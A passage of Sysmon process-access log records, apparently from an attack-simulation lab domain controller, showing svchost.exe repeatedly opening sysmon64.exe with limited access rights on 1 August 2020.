05:46:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1281,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1282,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1283,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1284,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1285,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1286,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1287,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1288,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 